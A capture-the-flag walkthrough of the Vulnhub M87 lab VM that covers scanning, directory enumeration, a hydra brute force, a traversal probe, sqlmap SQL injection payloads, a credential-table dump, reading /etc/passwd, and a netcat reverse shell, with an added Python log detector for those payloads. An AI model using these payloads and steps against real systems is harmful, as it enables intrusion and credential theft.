M87
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.59.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:9e:f5:5c 1 60 PCS Systemtechnik GmbH
192.168.56.225 08:00:27:2c:7e:11 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.225.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.225 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 20:57 EST
Nmap scan report for localhost (192.168.56.225)
Host is up (0.00019s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: M87 Login Form
|_http-server-header: Apache/2.4.38 (Debian)
9090/tcp open ssl/zeus-admin?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| Transfer-Encoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| Cross-Origin-Resource-Policy: same-origin
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
| font-weight: 300;
|_ margin: 0 0 10p
| ssl-cert: Subject: commonName=M87/organizationName=662b442c19a840e482f9f69cde8f316e
| Subject Alternative Name: IP Address:127.0.0.1, DNS:localhost
| Not valid before: 2022-11-27T01:57:33
|_Not valid after: 2023-11-27T01:57:33
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:2C:7E:11 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 185.54 seconds
The NMAP scan shows the target host has two open ports: 80 (HTTP) and 9090 (HTTPS).
Get Access
Visiting port 80 returns a login page that asks for an e-mail address and password. The page source contains nothing of value.
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ curl http://192.168.56.225/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.225 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ gobuster dir -u http://192.168.56.225 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.225
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/26 21:04:40 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 316] [--> http://192.168.56.225/admin/]
/assets (Status: 301) [Size: 317] [--> http://192.168.56.225/assets/]
/LICENSE (Status: 200) [Size: 1073]
/server-status (Status: 403) [Size: 279]
Progress: 217761 / 220561 (98.73%)
===============================================================
2022/11/26 21:05:05 Finished
===============================================================
Gobuster finds the /admin directory. Visiting it shows yet another login form, but this one submits via GET, which is odd and vaguely feels like the entry point. Submitting admin, password and similar values, however, produces no response at all.
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ dirb http://192.168.56.225
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 26 21:11:01 2022
URL_BASE: http://192.168.56.225/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.225/ ----
==> DIRECTORY: http://192.168.56.225/admin/
==> DIRECTORY: http://192.168.56.225/assets/
+ http://192.168.56.225/index.html (CODE:200|SIZE:1322)
+ http://192.168.56.225/LICENSE (CODE:200|SIZE:1073)
+ http://192.168.56.225/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.56.225/admin/ ----
==> DIRECTORY: http://192.168.56.225/admin/backup/
==> DIRECTORY: http://192.168.56.225/admin/css/
==> DIRECTORY: http://192.168.56.225/admin/images/
+ http://192.168.56.225/admin/index.php (CODE:200|SIZE:4393)
==> DIRECTORY: http://192.168.56.225/admin/js/
---- Entering directory: http://192.168.56.225/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.225/admin/backup/ ----
+ http://192.168.56.225/admin/backup/index.php (CODE:200|SIZE:4412)
---- Entering directory: http://192.168.56.225/admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.225/admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.225/admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Nov 26 21:11:05 2022
DOWNLOADED: 13836 - FOUND: 5
Another tool, dirb, finds a backup directory under /admin; visiting it shows another login page.
Crack it with hydra. Capturing the request shows the method is GET:
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 192.168.56.225 http-get /admin/backup
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-26 21:42:15
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://192.168.56.225:80/admin/backup
[80][http-get] host: 192.168.56.225 login: admin password: 123456
[STATUS] attack finished for 192.168.56.225 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-26 21:42:16
The password 123456 is cracked very quickly, but logging in with it returns the same response as a wrong password, which is odd.
Right, port 9090 has not been analysed yet:
Visiting port 9090 returns another login page.
Looking at other people's write-ups, the entry point is still the http://192.168.56.225/admin/ page.
Let's see whether a parameter can be FUZZed out:
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ wfuzz -c -u http://192.168.56.225/admin/?FUZZ=../../../../../../etc/passwd -w /usr/share/seclists/Discovery/Web-Content/common.txt --hw 159
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.225/admin/?FUZZ=../../../../../../etc/passwd
Total requests: 4713
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000002139: 200 84 L 188 W 4569 Ch "id"
Since the parameter name is id, this is probably not file inclusion; check for SQL injection instead.
Visiting:
http://192.168.56.225/admin/?id=1%27
returns the error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
The target host may have a SQL injection vulnerability; run SQLMAP against it:
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ sqlmap --url 192.168.56.225/admin/?id=1
___
__H__
___ ___[']_____ ___ ___ {1.6.7#stable}
|_ -| . ['] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:06:24 /2022-11-26/
[22:06:24] [INFO] testing connection to the target URL
[22:06:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:06:24] [INFO] testing if the target URL content is stable
[22:06:25] [INFO] target URL content is stable
[22:06:25] [INFO] testing if GET parameter 'id' is dynamic
[22:06:25] [WARNING] GET parameter 'id' does not appear to be dynamic
[22:06:25] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[22:06:25] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[22:06:25] [INFO] testing for SQL injection on GET parameter 'id'
y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[22:06:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:06:34] [WARNING] reflective value(s) found and filtering out
[22:06:34] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:06:34] [INFO] testing 'Generic inline queries'
[22:06:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:06:34] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:06:34] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[22:06:34] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:06:35] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[22:06:35] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[22:06:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[22:06:36] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[22:06:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[22:06:37] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[22:06:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[22:06:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[22:06:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[22:06:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[22:06:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[22:06:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[22:06:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[22:06:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[22:06:37] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[22:06:37] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[22:06:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[22:06:37] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[22:06:37] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[22:06:38] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[22:06:38] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[22:06:38] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[22:06:38] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[22:06:38] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[22:06:39] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[22:06:39] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[22:06:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:06:39] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[22:06:39] [INFO] testing 'MySQL inline queries'
[22:06:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[22:06:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[22:06:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[22:06:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[22:06:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[22:06:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[22:06:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:06:49] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[22:06:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:06:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:06:49] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:06:49] [INFO] target URL appears to have 1 column in query
[22:06:49] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 1185 HTTP(s) requests:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 6900 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(6900=6900,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8702 FROM (SELECT(SLEEP(5)))onig)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=1 UNION ALL SELECT CONCAT(0x7176717071,0x434e59716b59724653715662757a654a55496c756a676348664b486a5368636e7772454b42744749,0x7171787071)-- -
---
[22:07:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[22:07:00] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.225'
[*] ending @ 22:07:00 /2022-11-26/
The id parameter is indeed vulnerable to SQL injection.
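From the defender's side, the whole probing sequence above leaves a clear trail in the Apache access log: the 1' syntax probe, the wfuzz traversal test, sqlmap's error-based, time-based and UNION payloads, and a burst of over a thousand requests against one route. The following Python detector is an added example, not code from the original post or the M87 VM; the log lines it scans are constructed to mirror those requests, and the rule names and thresholds are my own choices.

```python
"""Detect the /admin/?id= probing seen in this write-up from Apache access logs."""
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# Apache "combined" log format: ip ident user [date] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Rules are matched against the URL-decoded query string. Each name corresponds
# to one of the techniques in the walkthrough (rule names are my own labels).
SQLI_RULES = {
    "quote-probe": re.compile(r"=\d*'(?:\s|$|&)"),                 # id=1'
    "union": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),   # UNION ALL SELECT
    "time-based": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),   # SLEEP(5)
    "error-based": re.compile(r"floor\s*\(\s*rand\s*\(|information_schema", re.I),
    "traversal": re.compile(r"(?:\.\./){2,}|/etc/passwd"),           # wfuzz LFI probe
    "comment-tail": re.compile(r"--[\s-]*$"),                        # trailing "-- -"
}

# Constructed sample log (not a real capture): benign traffic, the manual 1' probe,
# the wfuzz traversal test and sqlmap's three confirmed payloads from the write-up,
# URL-encoded the way Apache would record them.
SAMPLE_LOG = [
    '192.168.56.1 - - [26/Nov/2022:22:05:59 -0500] "GET /admin/?id=1 HTTP/1.1" 200 4569 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [26/Nov/2022:22:06:00 -0500] "GET /assets/css/main.css HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '192.168.56.206 - - [26/Nov/2022:22:06:10 -0500] "GET /admin/?id=1%27 HTTP/1.1" 200 4610 "-" "Mozilla/5.0"',
    '192.168.56.206 - - [26/Nov/2022:22:06:39 -0500] "GET /admin/?id=1%20AND%20(SELECT%206900%20FROM(SELECT%20COUNT(*),CONCAT(0x7176717071,(SELECT%20(ELT(6900=6900,1))),0x7171787071,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a) HTTP/1.1" 200 4700 "-" "sqlmap/1.6.7#stable (https://sqlmap.org)"',
    '192.168.56.206 - - [26/Nov/2022:22:06:44 -0500] "GET /admin/?id=1%20AND%20(SELECT%208702%20FROM%20(SELECT(SLEEP(5)))onig) HTTP/1.1" 200 4569 "-" "sqlmap/1.6.7#stable (https://sqlmap.org)"',
    '192.168.56.206 - - [26/Nov/2022:22:06:49 -0500] "GET /admin/?id=1%20UNION%20ALL%20SELECT%20CONCAT(0x7176717071,0x41,0x7171787071)--%20- HTTP/1.1" 200 4600 "-" "sqlmap/1.6.7#stable (https://sqlmap.org)"',
    '192.168.56.206 - - [26/Nov/2022:21:58:12 -0500] "GET /admin/?id=../../../../../../etc/passwd HTTP/1.1" 200 4569 "-" "Wfuzz/3.1.0"',
]


def parse_line(line):
    """Parse one combined-format line; return a dict or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["path"])
    rec["route"] = parts.path
    # unquote_plus turns %27 into ' and %20/+ into spaces, as the server saw them
    rec["query"] = unquote_plus(parts.query)
    rec["params"] = dict(parse_qsl(parts.query, keep_blank_values=True))
    return rec


def classify(query):
    """Return the names of every rule the decoded query string triggers, in rule order."""
    return [name for name, rx in SQLI_RULES.items() if rx.search(query)]


def scan(lines, burst_threshold=20):
    """Classify each request and flag per-IP bursts of parameterised requests to one route.

    Returns (hits, bursts): hits is a list of (ip, route, rules) for requests that
    triggered at least one rule; bursts maps (ip, route) -> request count for
    sources that sent at least burst_threshold parameterised requests to a route
    (sqlmap sent 1185 requests to /admin/ in the write-up, wfuzz 4713).
    """
    hits = []
    per_route = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["params"]:
            per_route[(rec["ip"], rec["route"])] += 1
        rules = classify(rec["query"])
        if rules:
            hits.append((rec["ip"], rec["route"], tuple(rules)))
    bursts = {key: n for key, n in per_route.items() if n >= burst_threshold}
    return hits, bursts


if __name__ == "__main__":
    found, noisy = scan(SAMPLE_LOG)
    for ip, route, rules in found:
        print(f"{ip} {route} -> {', '.join(rules)}")
    for (ip, route), n in noisy.items():
        print(f"burst: {ip} sent {n} parameterised requests to {route}")
```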
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ sqlmap --url 192.168.56.225/admin/?id=1 -D db -T users -C username,password --dump
___
__H__
___ ___[(]_____ ___ ___ {1.6.7#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:11:47 /2022-11-26/
[22:11:47] [INFO] resuming back-end DBMS 'mysql'
[22:11:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 6900 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(6900=6900,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8702 FROM (SELECT(SLEEP(5)))onig)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=1 UNION ALL SELECT CONCAT(0x7176717071,0x434e59716b59724653715662757a654a55496c756a676348664b486a5368636e7772454b42744749,0x7171787071)-- -
---
[22:11:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[22:11:47] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'db'
Database: db
Table: users
[10 entries]
+----------+-----------------+
| username | password |
+----------+-----------------+
| jack | gae5g5a |
| ceo | 5t96y4i95y |
| brad | gae5g5a |
| expenses | 5t96y4i95y |
| julia | fw54vrfwe45 |
| mike | 4kworw4 |
| adrian | fw54vrfwe45 |
| john | 4kworw4 |
| admin | 15The4Dm1n4L1f3 |
| alex | dsfsrw4 |
+----------+-----------------+
[22:11:47] [INFO] table 'db.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.225/dump/db/users.csv'
[22:11:47] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.225'
[*] ending @ 22:11:47 /2022-11-26/
These usernames and passwords were found, but none of these usernames and passwords can
sqlmap can be used to read files:
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ sqlmap --url 192.168.56.225/admin/?id=1 -D db --file-read /etc/passwd
___
__H__
___ ___[.]_____ ___ ___ {1.6.7#stable}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:13:33 /2022-11-26/
[22:13:33] [INFO] resuming back-end DBMS 'mysql'
[22:13:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 6900 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(6900=6900,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8702 FROM (SELECT(SLEEP(5)))onig)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=1 UNION ALL SELECT CONCAT(0x7176717071,0x434e59716b59724653715662757a654a55496c756a676348664b486a5368636e7772454b42744749,0x7171787071)-- -
---
[22:13:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[22:13:33] [INFO] fingerprinting the back-end DBMS operating system
[22:13:33] [INFO] the back-end DBMS operating system is Linux
[22:13:33] [INFO] fetching file: '/etc/passwd'
do you want confirmation that the remote file '/etc/passwd' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
[22:13:40] [INFO] the local file '/home/kali/.local/share/sqlmap/output/192.168.56.225/files/_etc_passwd' and the remote file '/etc/passwd' have the same size (1786 B)
files saved to [1]:
[*] /home/kali/.local/share/sqlmap/output/192.168.56.225/files/_etc_passwd (same file)
[22:13:40] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.225'
[*] ending @ 22:13:40 /2022-11-26/
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ ls
bg-01.jpg nmap_full_scan req.txt
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ cat /home/kali/.local/share/sqlmap/output/192.168.56.225/files/_etc_passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
charlotte:x:1000:1000:charlotte,,,:/home/charlotte:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:107:115:MySQL Server,,,:/nonexistent:/bin/false
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
Debian-exim:x:109:116::/var/spool/exim4:/usr/sbin/nologin
cockpit-ws:x:110:117::/nonexisting:/usr/sbin/nologin
cockpit-wsinstance:x:111:118::/nonexisting:/usr/sbin/nologin
Collecting all the users and passwords and brute-forcing with Burp, in the end charlotte:15The4Dm1n4L1f3 logs in to the home page on port 9090.
Privilege escalation
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.225] 33882
id
uid=1000(charlotte) gid=1000(charlotte) groups=1000(charlotte),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
charlotte@M87:~$ ls
ls
local.txt
charlotte@M87:~$ cat local.txt
cat local.txt
29247ebdec52ba0b9a6fd10d68f6b91f
charlotte@M87:~$ ls -alh
ls -alh
total 32K
drwxr-xr-x 3 charlotte charlotte 4.0K Nov 6 2020 .
drwxr-xr-x 3 root root 4.0K Nov 6 2020 ..
lrwxrwxrwx 1 root root 9 Nov 6 2020 .bash_history -> /dev/null
-rw-r--r-- 1 charlotte charlotte 220 Nov 6 2020 .bash_logout
-rw-r--r-- 1 charlotte charlotte 3.5K Nov 6 2020 .bashrc
drwx------ 3 charlotte charlotte 4.0K Nov 26 22:15 .gnupg
-rw------- 1 charlotte charlotte 33 Nov 6 2020 local.txt
-rw-r--r-- 1 charlotte charlotte 807 Nov 6 2020 .profile
-rw------- 1 charlotte charlotte 49 Nov 6 2020 .Xauthority
charlotte@M87:~$ sudo -l
sudo -l
[sudo] password for charlotte: 15The4Dm1n4L1f3
Sorry, user charlotte may not run sudo on M87.
charlotte@M87:~$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/usr/sbin/pppd
/usr/sbin/exim4
/usr/bin/watch
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/rsync
/usr/bin/su
/usr/bin/chsh
/usr/bin/ntfs-3g
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
